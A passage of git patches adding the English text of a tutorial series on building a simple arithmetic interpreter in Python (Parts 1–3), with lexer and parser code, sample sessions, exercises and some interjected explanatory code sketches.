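+As an aside, instead of hand-editing the raw_input call for Python 3, you could drop a small compatibility shim near the top of calc1.py. This shim is my own addition rather than part of the original listing:
+
+```
+# Python 2/3 compatibility shim (not in the original calc1.py):
+# Python 3 has no raw_input, so alias it to input there.
+try:
+    raw_input
+except NameError:
+    raw_input = input
+```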
+
+For your simple calculator to work properly without throwing an exception, your input needs to follow certain rules:
+
+ * Only single digit integers are allowed in the input
+ * The only arithmetic operation supported at the moment is addition
+ * No whitespace characters are allowed anywhere in the input
+
+
+
+Those restrictions are necessary to make the calculator simple. Don't worry, you'll make it pretty complex pretty soon.
+
+Okay, now let's dive in and see how your interpreter works and how it evaluates arithmetic expressions.
+
+When you enter an expression 3+5 on the command line your interpreter gets a string "3+5". In order for the interpreter to actually understand what to do with that string it first needs to break the input "3+5" into components called **tokens**. A **token** is an object that has a type and a value. For example, for the string "3" the type of the token will be INTEGER and the corresponding value will be integer 3.
+
+The process of breaking the input string into tokens is called **lexical analysis**. So, the first step your interpreter needs to do is read the input of characters and convert it into a stream of tokens. The part of the interpreter that does it is called a **lexical analyzer** , or **lexer** for short. You might also encounter other names for the same component, like **scanner** or **tokenizer**. They all mean the same: the part of your interpreter or compiler that turns the input of characters into a stream of tokens.
+
+The method get_next_token of the Interpreter class is your lexical analyzer. Every time you call it, you get the next token created from the input of characters passed to the interpreter. Let's take a closer look at the method itself and see how it actually does its job of converting characters into tokens. The input is stored in the variable text that holds the input string and pos is an index into that string (think of the string as an array of characters). pos is initially set to 0 and points to the character '3'. The method first checks whether the character is a digit and if so, it increments pos and returns a token instance with the type INTEGER and the value set to the integer value of the string '3', which is an integer 3:
+
+![][8]
+
+The pos now points to the '+' character in the text. The next time you call the method, it tests if a character at the position pos is a digit and then it tests if the character is a plus sign, which it is. As a result the method increments pos and returns a newly created token with the type PLUS and value '+':
+
+![][9]
+
+The pos now points to character '5'. When you call the get_next_token method again the method checks if it's a digit, which it is, so it increments pos and returns a new INTEGER token with the value of the token set to integer 5: ![][10]
+
+Because the pos index is now past the end of the string "3+5" the get_next_token method returns the EOF token every time you call it:
+
+![][11]
+
+Try it out and see for yourself how the lexer component of your calculator works:
+```
+>>> from calc1 import Interpreter
+>>>
+>>> interpreter = Interpreter('3+5')
+>>> interpreter.get_next_token()
+Token(INTEGER, 3)
+>>>
+>>> interpreter.get_next_token()
+Token(PLUS, '+')
+>>>
+>>> interpreter.get_next_token()
+Token(INTEGER, 5)
+>>>
+>>> interpreter.get_next_token()
+Token(EOF, None)
+>>>
+```
+
+So now that your interpreter has access to the stream of tokens made from the input characters, the interpreter needs to do something with it: it needs to find the structure in the flat stream of tokens it gets from the lexer get_next_token. Your interpreter expects to find the following structure in that stream: INTEGER -> PLUS -> INTEGER. That is, it tries to find a sequence of tokens: integer followed by a plus sign followed by an integer.
+
+The method responsible for finding and interpreting that structure is expr. This method verifies that the sequence of tokens does indeed correspond to the expected sequence of tokens, i.e. INTEGER -> PLUS -> INTEGER. After it has successfully confirmed the structure, it generates the result by adding the value of the token on the left side of the PLUS to the value of the token on the right side of the PLUS, thus successfully interpreting the arithmetic expression you passed to the interpreter.
+
+The expr method itself uses the helper method eat to verify that the token type passed to the eat method matches the current token type. After matching the passed token type the eat method gets the next token and assigns it to the current_token variable, thus effectively "eating" the currently matched token and advancing the imaginary pointer in the stream of tokens. If the structure in the stream of tokens doesn't correspond to the expected INTEGER PLUS INTEGER sequence of tokens the eat method throws an exception.
+
+Let's recap what your interpreter does to evaluate an arithmetic expression:
+
+ * The interpreter accepts an input string, let's say "3+5"
+ * The interpreter calls the expr method to find a structure in the stream of tokens returned by the lexical analyzer get_next_token. The structure it tries to find is of the form INTEGER PLUS INTEGER. After it's confirmed the structure, it interprets the input by adding the values of two INTEGER tokens because it's clear to the interpreter at that point that what it needs to do is add two integers, 3 and 5.
+
+Congratulate yourself. You've just learned how to build your very first interpreter!
+
+Now it's time for exercises.
+
+![][12]
+
+You didn't think you would just read this article and that would be enough, did you? Okay, get your hands dirty and do the following exercises:
+
+ 1. Modify the code to allow multiple-digit integers in the input, for example "12+3"
+ 2. Add a method that skips whitespace characters so that your calculator can handle inputs with whitespace characters like " 12 + 3"
+ 3. Modify the code and instead of '+' handle '-' to evaluate subtractions like "7-5"
+
+
+
+**Check your understanding**
+
+ 1. What is an interpreter?
+ 2. What is a compiler?
+ 3. What's the difference between an interpreter and a compiler?
+ 4. What is a token?
+ 5. What is the name of the process that breaks input apart into tokens?
+ 6. What is the part of the interpreter that does lexical analysis called?
+ 7. What are the other common names for that part of an interpreter or a compiler?
+
+
+
+Before I finish this article, I really want you to commit to studying interpreters and compilers. And I want you to do it right now. Don't put it on the back burner. Don't wait. If you've skimmed the article, start over. If you've read it carefully but haven't done exercises - do them now. If you've done only some of them, finish the rest. You get the idea. And you know what? Sign the commitment pledge to start learning about interpreters and compilers today!
+
+
+
+_I, ________, being of sound mind and body, do hereby pledge to commit to studying interpreters and compilers starting today and get to a point where I know 100% how they work!_
+
+Signature:
+
+Date:
+
+![][13]
+
+Sign it, date it, and put it somewhere where you can see it every day to make sure that you stick to your commitment. And keep in mind the definition of commitment:
+
+> "Commitment is doing the thing you said you were going to do long after the mood you said it in has left you." -- Darren Hardy
+
+Okay, that's it for today. In the next article of the mini series you will extend your calculator to handle more arithmetic expressions. Stay tuned.
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://ruslanspivak.com/lsbasi-part1/
+
+作者:[Ruslan Spivak][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://ruslanspivak.com
+[1]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_i_dont_know.png
+[2]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_omg.png
+[3]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_i_know.png
+[4]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_compiler_interpreter.png
+[5]:https://en.wikipedia.org/wiki/Pascal_%28programming_language%29
+[6]:https://docs.python.org/2/library/pdb.html
+[7]:https://github.com/rspivak/lsbasi/blob/master/part1/calc1.py
+[8]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_lexer1.png
+[9]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_lexer2.png
+[10]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_lexer3.png
+[11]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_lexer4.png
+[12]:https://ruslanspivak.com/lsbasi-part1/lsbasi_exercises2.png
+[13]:https://ruslanspivak.com/lsbasi-part1/lsbasi_part1_commitment_pledge.png
+[14]:http://ruslanspivak.com/lsbaws-part1/ (Part 1)
+[15]:http://ruslanspivak.com/lsbaws-part2/ (Part 2)
+[16]:http://ruslanspivak.com/lsbaws-part3/ (Part 3)
From 76a923bc2a0f24febc4006d9b0e2f2943c7e2321 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 20:04:53 +0800
Subject: [PATCH 252/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Let=E2=80=99s=20B?=
=?UTF-8?q?uild=20A=20Simple=20Interpreter.=20Part=202.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...t-s Build A Simple Interpreter. Part 2..md | 244 ++++++++++++++++++
1 file changed, 244 insertions(+)
create mode 100644 sources/tech/20150703 Let-s Build A Simple Interpreter. Part 2..md
diff --git a/sources/tech/20150703 Let-s Build A Simple Interpreter. Part 2..md b/sources/tech/20150703 Let-s Build A Simple Interpreter. Part 2..md
new file mode 100644
index 0000000000..b9f923e048
--- /dev/null
+++ b/sources/tech/20150703 Let-s Build A Simple Interpreter. Part 2..md
@@ -0,0 +1,244 @@
+Let’s Build A Simple Interpreter. Part 2.
+======
+
+In their amazing book "The 5 Elements of Effective Thinking" the authors Burger and Starbird share a story about how they observed Tony Plog, an internationally acclaimed trumpet virtuoso, conduct a master class for accomplished trumpet players. The students first played complex music phrases, which they played perfectly well. But then they were asked to play very basic, simple notes. When they played the notes, the notes sounded childish compared to the previously played complex phrases. After they finished playing, the master teacher also played the same notes, but when he played them, they did not sound childish. The difference was stunning. Tony explained that mastering the performance of simple notes allows one to play complex pieces with greater control. The lesson was clear - to build true virtuosity one must focus on mastering simple, basic ideas.
+
+The lesson in the story clearly applies not only to music but also to software development. The story is a good reminder to all of us to not lose sight of the importance of deep work on simple, basic ideas even if it sometimes feels like a step back. While it is important to be proficient with a tool or framework you use, it is also extremely important to know the principles behind them. As Ralph Waldo Emerson said:
+
+> "If you learn only methods, you'll be tied to your methods. But if you learn principles, you can devise your own methods."
+
+On that note, let's dive into interpreters and compilers again.
+
+Today I will show you a new version of the calculator from [Part 1][1] that will be able to:
+
+ 1. Handle whitespace characters anywhere in the input string
+ 2. Consume multi-digit integers from the input
+ 3. Subtract two integers (currently it can only add integers)
+
+
+
+Here is the source code for your new version of the calculator that can do all of the above:
+```
+# Token types
+# EOF (end-of-file) token is used to indicate that
+# there is no more input left for lexical analysis
+INTEGER, PLUS, MINUS, EOF = 'INTEGER', 'PLUS', 'MINUS', 'EOF'
+
+
+class Token(object):
+ def __init__(self, type, value):
+ # token type: INTEGER, PLUS, MINUS, or EOF
+ self.type = type
+ # token value: non-negative integer value, '+', '-', or None
+ self.value = value
+
+ def __str__(self):
+ """String representation of the class instance.
+
+ Examples:
+ Token(INTEGER, 3)
+ Token(PLUS '+')
+ """
+ return 'Token({type}, {value})'.format(
+ type=self.type,
+ value=repr(self.value)
+ )
+
+ def __repr__(self):
+ return self.__str__()
+
+
+class Interpreter(object):
+ def __init__(self, text):
+ # client string input, e.g. "3 + 5", "12 - 5", etc
+ self.text = text
+ # self.pos is an index into self.text
+ self.pos = 0
+ # current token instance
+ self.current_token = None
+ self.current_char = self.text[self.pos]
+
+ def error(self):
+ raise Exception('Error parsing input')
+
+ def advance(self):
+ """Advance the 'pos' pointer and set the 'current_char' variable."""
+ self.pos += 1
+ if self.pos > len(self.text) - 1:
+ self.current_char = None # Indicates end of input
+ else:
+ self.current_char = self.text[self.pos]
+
+ def skip_whitespace(self):
+ while self.current_char is not None and self.current_char.isspace():
+ self.advance()
+
+ def integer(self):
+ """Return a (multidigit) integer consumed from the input."""
+ result = ''
+ while self.current_char is not None and self.current_char.isdigit():
+ result += self.current_char
+ self.advance()
+ return int(result)
+
+ def get_next_token(self):
+ """Lexical analyzer (also known as scanner or tokenizer)
+
+ This method is responsible for breaking a sentence
+ apart into tokens.
+ """
+ while self.current_char is not None:
+
+ if self.current_char.isspace():
+ self.skip_whitespace()
+ continue
+
+ if self.current_char.isdigit():
+ return Token(INTEGER, self.integer())
+
+ if self.current_char == '+':
+ self.advance()
+ return Token(PLUS, '+')
+
+ if self.current_char == '-':
+ self.advance()
+ return Token(MINUS, '-')
+
+ self.error()
+
+ return Token(EOF, None)
+
+ def eat(self, token_type):
+ # compare the current token type with the passed token
+ # type and if they match then "eat" the current token
+ # and assign the next token to the self.current_token,
+ # otherwise raise an exception.
+ if self.current_token.type == token_type:
+ self.current_token = self.get_next_token()
+ else:
+ self.error()
+
+ def expr(self):
+ """Parser / Interpreter
+
+ expr -> INTEGER PLUS INTEGER
+ expr -> INTEGER MINUS INTEGER
+ """
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ # we expect the current token to be an integer
+ left = self.current_token
+ self.eat(INTEGER)
+
+ # we expect the current token to be either a '+' or '-'
+ op = self.current_token
+ if op.type == PLUS:
+ self.eat(PLUS)
+ else:
+ self.eat(MINUS)
+
+ # we expect the current token to be an integer
+ right = self.current_token
+ self.eat(INTEGER)
+ # after the above call the self.current_token is set to
+ # EOF token
+
+ # at this point either the INTEGER PLUS INTEGER or
+ # the INTEGER MINUS INTEGER sequence of tokens
+ # has been successfully found and the method can just
+ # return the result of adding or subtracting two integers,
+ # thus effectively interpreting client input
+ if op.type == PLUS:
+ result = left.value + right.value
+ else:
+ result = left.value - right.value
+ return result
+
+
+def main():
+ while True:
+ try:
+ # To run under Python3 replace 'raw_input' call
+ # with 'input'
+ text = raw_input('calc> ')
+ except EOFError:
+ break
+ if not text:
+ continue
+ interpreter = Interpreter(text)
+ result = interpreter.expr()
+ print(result)
+
+
+if __name__ == '__main__':
+ main()
+```
+
+Save the above code into the calc2.py file or download it directly from [GitHub][2]. Try it out. See for yourself that it works as expected: it can handle whitespace characters anywhere in the input, it can accept multi-digit integers, and it can subtract two integers as well as add them.
+
+Here is a sample session that I ran on my laptop:
+```
+$ python calc2.py
+calc> 27 + 3
+30
+calc> 27 - 7
+20
+calc>
+```
+
+The major code changes compared with the version from [Part 1][1] are:
+
+ 1. The get_next_token method was refactored a bit. The logic to increment the pos pointer was factored out into a separate advance method.
+ 2. Two more methods were added: skip_whitespace to ignore whitespace characters and integer to handle multi-digit integers in the input.
+ 3. The expr method was modified to recognize the INTEGER -> MINUS -> INTEGER phrase in addition to the INTEGER -> PLUS -> INTEGER phrase. The method now also interprets both addition and subtraction after having successfully recognized the corresponding phrase.
+
+In [Part 1][1] you learned two important concepts, namely that of a **token** and a **lexical analyzer**. Today I would like to talk a little bit about **lexemes**, **parsing**, and **parsers**.
+
+You already know about tokens. But in order for me to round out the discussion of tokens I need to mention lexemes. What is a lexeme? A **lexeme** is a sequence of characters that form a token. In the following picture you can see some examples of tokens and sample lexemes and hopefully it will make the relationship between them clear:
+
+![][3]
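+
+If it helps to see the same idea in code, here is a tiny sketch of my own (it is not part of the article's calculator, and the variable names are purely illustrative):
+```
+# The lexeme is the raw substring scanned from the input text; the token is
+# the (type, value) pair the lexer builds from that lexeme.
+lexeme = '123'                         # characters consumed from the input
+token = ('INTEGER', int(lexeme))       # token type plus the computed value
+print('{0} -> {1}'.format(lexeme, token))   # 123 -> ('INTEGER', 123)
+```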
+
+Now, remember our friend, the expr method? I said before that that's where the interpretation of an arithmetic expression actually happens. But before you can interpret an expression you first need to recognize what kind of phrase it is, whether it is addition or subtraction, for example. That's what the expr method essentially does: it finds the structure in the stream of tokens it gets from the get_next_token method and then it interprets the phrase that it has recognized, generating the result of the arithmetic expression.
+
+The process of finding the structure in the stream of tokens, or put differently, the process of recognizing a phrase in the stream of tokens is called **parsing**. The part of an interpreter or compiler that performs that job is called a **parser**.
+
+So now you know that the expr method is the part of your interpreter where both **parsing** and **interpreting** happen - the expr method first tries to recognize (**parse**) the INTEGER -> PLUS -> INTEGER or the INTEGER -> MINUS -> INTEGER phrase in the stream of tokens, and after it has successfully recognized (**parsed**) one of those phrases, the method interprets it and returns the result of either addition or subtraction of two integers to the caller.
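+
+To make those two roles easier to tell apart, here is a small sketch of my own (not the article's code) that does the same work for a single INTEGER PLUS INTEGER or INTEGER MINUS INTEGER phrase but splits recognition and evaluation into two functions; the function names are just illustrative:
+```
+# Hedged illustration: the parsing step only checks the shape of the phrase,
+# while the interpreting step computes its value.
+def parse(tokens):
+    """tokens is a list of (type, value) pairs produced by a lexer."""
+    types = [token_type for token_type, _ in tokens]
+    if types not in (['INTEGER', 'PLUS', 'INTEGER'],
+                     ['INTEGER', 'MINUS', 'INTEGER']):
+        raise Exception('Error parsing input')
+    return tokens                      # the recognized phrase
+
+
+def interpret(phrase):
+    (_, left), (op, _), (_, right) = phrase
+    return left + right if op == 'PLUS' else left - right
+
+
+print(interpret(parse([('INTEGER', 27), ('MINUS', '-'), ('INTEGER', 7)])))  # 20
+```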
+
+And now it's time for exercises again.
+
+![][4]
+
+ 1. Extend the calculator to handle multiplication of two integers
+ 2. Extend the calculator to handle division of two integers
+ 3. Modify the code to interpret expressions containing an arbitrary number of additions and subtractions, for example "9 - 5 + 3 + 11"
+
+
+
+**Check your understanding.**
+
+ 1. What is a lexeme?
+ 2. What is the name of the process that finds the structure in the stream of tokens, or put differently, what is the name of the process that recognizes a certain phrase in that stream of tokens?
+ 3. What is the name of the part of the interpreter (compiler) that does parsing?
+
+
+
+
+I hope you liked today's material. In the next article of the series you will extend your calculator to handle more complex arithmetic expressions. Stay tuned.
+
+
+--------------------------------------------------------------------------------
+
+via: https://ruslanspivak.com/lsbasi-part2/
+
+作者:[Ruslan Spivak][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://ruslanspivak.com
+[1]:http://ruslanspivak.com/lsbasi-part1/ (Part 1)
+[2]:https://github.com/rspivak/lsbasi/blob/master/part2/calc2.py
+[3]:https://ruslanspivak.com/lsbasi-part2/lsbasi_part2_lexemes.png
+[4]:https://ruslanspivak.com/lsbasi-part2/lsbasi_part2_exercises.png
From 156f1f8e9435b7554f079e275d5f437eeb7643ad Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 20:09:07 +0800
Subject: [PATCH 253/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Let=E2=80=99s=20B?=
=?UTF-8?q?uild=20A=20Simple=20Interpreter.=20Part=203.?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...t-s Build A Simple Interpreter. Part 3..md | 340 ++++++++++++++++++
1 file changed, 340 insertions(+)
create mode 100644 sources/tech/20150812 Let-s Build A Simple Interpreter. Part 3..md
diff --git a/sources/tech/20150812 Let-s Build A Simple Interpreter. Part 3..md b/sources/tech/20150812 Let-s Build A Simple Interpreter. Part 3..md
new file mode 100644
index 0000000000..2502d2624a
--- /dev/null
+++ b/sources/tech/20150812 Let-s Build A Simple Interpreter. Part 3..md
@@ -0,0 +1,340 @@
+Let’s Build A Simple Interpreter. Part 3.
+======
+
+I woke up this morning and I thought to myself: "Why do we find it so difficult to learn a new skill?"
+
+I don't think it's just because of the hard work. I think that one of the reasons might be that we spend a lot of time and hard work acquiring knowledge by reading and watching, and not enough time translating that knowledge into a skill by practicing it. Take swimming, for example. You can spend a lot of time reading hundreds of books about swimming, talking for hours with experienced swimmers and coaches, and watching all the training videos available, and you will still sink like a rock the first time you jump in the pool.
+
+The bottom line is: it doesn't matter how well you think you know the subject - you have to put that knowledge into practice to turn it into a skill. To help you with the practice part I put exercises into [Part 1][1] and [Part 2][2] of the series. And yes, you will see more exercises in today's article and in future articles, I promise :)
+
+Okay, let's get started with today's material, shall we?
+
+
+So far, you've learned how to interpret arithmetic expressions that add or subtract two integers like "7 + 3" or "12 - 9". Today I'm going to talk about how to parse (recognize) and interpret arithmetic expressions that have any number of plus or minus operators in them, for example "7 - 3 + 2 - 1".
+
+Graphically, the arithmetic expressions in this article can be represented with the following syntax diagram:
+
+![][3]
+
+What is a syntax diagram? A **syntax diagram** is a graphical representation of a programming language's syntax rules. Basically, a syntax diagram visually shows you which statements are allowed in your programming language and which are not.
+
+Syntax diagrams are pretty easy to read: just follow the paths indicated by the arrows. Some paths indicate choices. And some paths indicate loops.
+
+You can read the above syntax diagram as follows: a term optionally followed by a plus or minus sign, followed by another term, which in turn is optionally followed by a plus or minus sign followed by another term, and so on. You get the picture, literally. You might wonder what a "term" is. For the purpose of this article a "term" is just an integer.
+
+Syntax diagrams serve two main purposes:
+
+ * They graphically represent the specification (grammar) of a programming language.
+ * They can be used to help you write your parser - you can map a diagram to code by following simple rules.
+
+
+
+You've learned that the process of recognizing a phrase in the stream of tokens is called **parsing**. And the part of an interpreter or compiler that performs that job is called a **parser**. Parsing is also called **syntax analysis**, and the parser is also aptly called, you guessed it right, a **syntax analyzer**.
+
+According to the syntax diagram above, all of the following arithmetic expressions are valid:
+
+ * 3
+ * 3 + 4
+ * 7 - 3 + 2 - 1
+
+
+
+Because syntax rules for arithmetic expressions in different programming languages are very similar we can use a Python shell to "test" our syntax diagram. Launch your Python shell and see for yourself:
+```
+>>> 3
+3
+>>> 3 + 4
+7
+>>> 7 - 3 + 2 - 1
+5
+```
+
+No surprises here.
+
+The expression "3 + " is not a valid arithmetic expression though because according to the syntax diagram the plus sign must be followed by a term (integer), otherwise it's a syntax error. Again, try it with a Python shell and see for yourself:
+```
+>>> 3 +
+  File "<stdin>", line 1
+ 3 +
+ ^
+SyntaxError: invalid syntax
+```
+
+It's great to be able to use a Python shell to do some testing but let's map the above syntax diagram to code and use our own interpreter for testing, all right?
+
+You know from the previous articles ([Part 1][1] and [Part 2][2]) that the expr method is where both our parser and interpreter live. Again, the parser just recognizes the structure making sure that it corresponds to some specifications and the interpreter actually evaluates the expression once the parser has successfully recognized (parsed) it.
+
+The following code snippet shows the parser code corresponding to the diagram. The rectangular box from the syntax diagram (term) becomes a term method that parses an integer and the expr method just follows the syntax diagram flow:
+```
+def term(self):
+ self.eat(INTEGER)
+
+def expr(self):
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ self.term()
+ while self.current_token.type in (PLUS, MINUS):
+ token = self.current_token
+ if token.type == PLUS:
+ self.eat(PLUS)
+ self.term()
+ elif token.type == MINUS:
+ self.eat(MINUS)
+ self.term()
+```
+
+You can see that expr first calls the term method. Then the expr method has a while loop which can execute zero or more times. And inside the loop the parser makes a choice based on the token (whether it's a plus or minus sign). Spend some time proving to yourself that the code above does indeed follow the syntax diagram flow for arithmetic expressions.
+
+The parser itself does not interpret anything though: if it recognizes an expression it's silent, and if it doesn't, it raises a syntax error. Let's modify the expr method and add the interpreter code:
+```
+def term(self):
+ """Return an INTEGER token value"""
+ token = self.current_token
+ self.eat(INTEGER)
+ return token.value
+
+def expr(self):
+ """Parser / Interpreter """
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ result = self.term()
+ while self.current_token.type in (PLUS, MINUS):
+ token = self.current_token
+ if token.type == PLUS:
+ self.eat(PLUS)
+ result = result + self.term()
+ elif token.type == MINUS:
+ self.eat(MINUS)
+ result = result - self.term()
+
+ return result
+```
+
+Because the interpreter needs to evaluate an expression the term method was modified to return an integer value and the expr method was modified to perform addition and subtraction at the appropriate places and return the result of interpretation. Even though the code is pretty straightforward I recommend spending some time studying it.
+
+Let's get moving and see the complete code of the interpreter now, okay?
+
+Here is the source code for your new version of the calculator that can handle valid arithmetic expressions containing integers and any number of addition and subtraction operators:
+```
+# Token types
+#
+# EOF (end-of-file) token is used to indicate that
+# there is no more input left for lexical analysis
+INTEGER, PLUS, MINUS, EOF = 'INTEGER', 'PLUS', 'MINUS', 'EOF'
+
+
+class Token(object):
+ def __init__(self, type, value):
+ # token type: INTEGER, PLUS, MINUS, or EOF
+ self.type = type
+ # token value: non-negative integer value, '+', '-', or None
+ self.value = value
+
+ def __str__(self):
+ """String representation of the class instance.
+
+ Examples:
+ Token(INTEGER, 3)
+ Token(PLUS, '+')
+ """
+ return 'Token({type}, {value})'.format(
+ type=self.type,
+ value=repr(self.value)
+ )
+
+ def __repr__(self):
+ return self.__str__()
+
+
+class Interpreter(object):
+ def __init__(self, text):
+ # client string input, e.g. "3 + 5", "12 - 5 + 3", etc
+ self.text = text
+ # self.pos is an index into self.text
+ self.pos = 0
+ # current token instance
+ self.current_token = None
+ self.current_char = self.text[self.pos]
+
+ ##########################################################
+ # Lexer code #
+ ##########################################################
+ def error(self):
+ raise Exception('Invalid syntax')
+
+ def advance(self):
+ """Advance the `pos` pointer and set the `current_char` variable."""
+ self.pos += 1
+ if self.pos > len(self.text) - 1:
+ self.current_char = None # Indicates end of input
+ else:
+ self.current_char = self.text[self.pos]
+
+ def skip_whitespace(self):
+ while self.current_char is not None and self.current_char.isspace():
+ self.advance()
+
+ def integer(self):
+ """Return a (multidigit) integer consumed from the input."""
+ result = ''
+ while self.current_char is not None and self.current_char.isdigit():
+ result += self.current_char
+ self.advance()
+ return int(result)
+
+ def get_next_token(self):
+ """Lexical analyzer (also known as scanner or tokenizer)
+
+ This method is responsible for breaking a sentence
+ apart into tokens. One token at a time.
+ """
+ while self.current_char is not None:
+
+ if self.current_char.isspace():
+ self.skip_whitespace()
+ continue
+
+ if self.current_char.isdigit():
+ return Token(INTEGER, self.integer())
+
+ if self.current_char == '+':
+ self.advance()
+ return Token(PLUS, '+')
+
+ if self.current_char == '-':
+ self.advance()
+ return Token(MINUS, '-')
+
+ self.error()
+
+ return Token(EOF, None)
+
+ ##########################################################
+ # Parser / Interpreter code #
+ ##########################################################
+ def eat(self, token_type):
+ # compare the current token type with the passed token
+ # type and if they match then "eat" the current token
+ # and assign the next token to the self.current_token,
+ # otherwise raise an exception.
+ if self.current_token.type == token_type:
+ self.current_token = self.get_next_token()
+ else:
+ self.error()
+
+ def term(self):
+ """Return an INTEGER token value."""
+ token = self.current_token
+ self.eat(INTEGER)
+ return token.value
+
+ def expr(self):
+ """Arithmetic expression parser / interpreter."""
+ # set current token to the first token taken from the input
+ self.current_token = self.get_next_token()
+
+ result = self.term()
+ while self.current_token.type in (PLUS, MINUS):
+ token = self.current_token
+ if token.type == PLUS:
+ self.eat(PLUS)
+ result = result + self.term()
+ elif token.type == MINUS:
+ self.eat(MINUS)
+ result = result - self.term()
+
+ return result
+
+
+def main():
+ while True:
+ try:
+ # To run under Python3 replace 'raw_input' call
+ # with 'input'
+ text = raw_input('calc> ')
+ except EOFError:
+ break
+ if not text:
+ continue
+ interpreter = Interpreter(text)
+ result = interpreter.expr()
+ print(result)
+
+
+if __name__ == '__main__':
+ main()
+```
+
+Save the above code into the calc3.py file or download it directly from [GitHub][4]. Try it out. See for yourself that it can handle arithmetic expressions that you can derive from the syntax diagram I showed you earlier.
+
+Here is a sample session that I ran on my laptop:
+```
+$ python calc3.py
+calc> 3
+3
+calc> 7 - 4
+3
+calc> 10 + 5
+15
+calc> 7 - 3 + 2 - 1
+5
+calc> 10 + 1 + 2 - 3 + 4 + 6 - 15
+5
+calc> 3 +
+Traceback (most recent call last):
+ File "calc3.py", line 147, in
+ main()
+ File "calc3.py", line 142, in main
+ result = interpreter.expr()
+ File "calc3.py", line 123, in expr
+ result = result + self.term()
+ File "calc3.py", line 110, in term
+ self.eat(INTEGER)
+ File "calc3.py", line 105, in eat
+ self.error()
+ File "calc3.py", line 45, in error
+ raise Exception('Invalid syntax')
+Exception: Invalid syntax
+```
+
+
+Remember those exercises I mentioned at the beginning of the article: here they are, as promised :)
+
+![][5]
+
+ * Draw a syntax diagram for arithmetic expressions that contain only multiplication and division, for example "7 * 4 / 2 * 3". Seriously, just grab a pen or a pencil and try to draw one.
+ * Modify the source code of the calculator to interpret arithmetic expressions that contain only multiplication and division, for example "7 * 4 / 2 * 3" (one possible approach is sketched right after this list).
+ * Write an interpreter that handles arithmetic expressions like "7 - 3 + 2 - 1" from scratch. Use any programming language you're comfortable with and write it off the top of your head without looking at the examples. When you do that, think about components involved: a lexer that takes an input and converts it into a stream of tokens, a parser that feeds off the stream of the tokens provided by the lexer and tries to recognize a structure in that stream, and an interpreter that generates results after the parser has successfully parsed (recognized) a valid arithmetic expression. String those pieces together. Spend some time translating the knowledge you've acquired into a working interpreter for arithmetic expressions.
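+
+For the second exercise, here is one possible starting point - a compact sketch of my own, written as standalone functions rather than as a patch to the Interpreter class, so the names (tokenize, MUL, DIV) are my assumptions and not from the article:
+```
+# A hedged sketch (mine, not the article's solution) for interpreting
+# expressions that contain only multiplication and division.
+INTEGER, MUL, DIV, EOF = 'INTEGER', 'MUL', 'DIV', 'EOF'
+
+
+def tokenize(text):
+    """A minimal lexer: yields (type, value) pairs for the input string."""
+    pos = 0
+    while pos < len(text):
+        char = text[pos]
+        if char.isspace():
+            pos += 1
+        elif char.isdigit():
+            start = pos
+            while pos < len(text) and text[pos].isdigit():
+                pos += 1
+            yield (INTEGER, int(text[start:pos]))
+        elif char == '*':
+            yield (MUL, '*')
+            pos += 1
+        elif char == '/':
+            yield (DIV, '/')
+            pos += 1
+        else:
+            raise Exception('Invalid character: ' + char)
+    yield (EOF, None)
+
+
+def expr(text):
+    """term ((MUL | DIV) term)* -- the same shape as the diagram for + and -."""
+    tokens = tokenize(text)
+    token_type, value = next(tokens)
+    if token_type != INTEGER:
+        raise Exception('Invalid syntax')
+    result = value
+    token_type, value = next(tokens)
+    while token_type in (MUL, DIV):
+        op = token_type
+        token_type, value = next(tokens)
+        if token_type != INTEGER:
+            raise Exception('Invalid syntax')
+        # Integer division keeps the result a whole number, matching the
+        # integer-only calculator; this is a design choice, not a requirement.
+        result = result * value if op == MUL else result // value
+        token_type, value = next(tokens)
+    return result
+
+
+print(expr('7 * 4 / 2 * 3'))  # 42
+```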
+
+
+
+**Check your understanding.**
+
+ 1. What is a syntax diagram?
+ 2. What is syntax analysis?
+ 3. What is a syntax analyzer?
+
+
+
+
+Hey, look! You read all the way to the end. Thanks for hanging out here today and don't forget to do the exercises. :) I'll be back next time with a new article - stay tuned.
+
+
+--------------------------------------------------------------------------------
+
+via: https://ruslanspivak.com/lsbasi-part3/
+
+作者:[Ruslan Spivak][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://ruslanspivak.com
+[1]:http://ruslanspivak.com/lsbasi-part1/ (Part 1)
+[2]:http://ruslanspivak.com/lsbasi-part2/ (Part 2)
+[3]:https://ruslanspivak.com/lsbasi-part3/lsbasi_part3_syntax_diagram.png
+[4]:https://github.com/rspivak/lsbasi/blob/master/part3/calc3.py
+[5]:https://ruslanspivak.com/lsbasi-part3/lsbasi_part3_exercises.png
From 3ceaeeea448da6754f473ce32d3bca1ad668ed19 Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 20:30:30 +0800
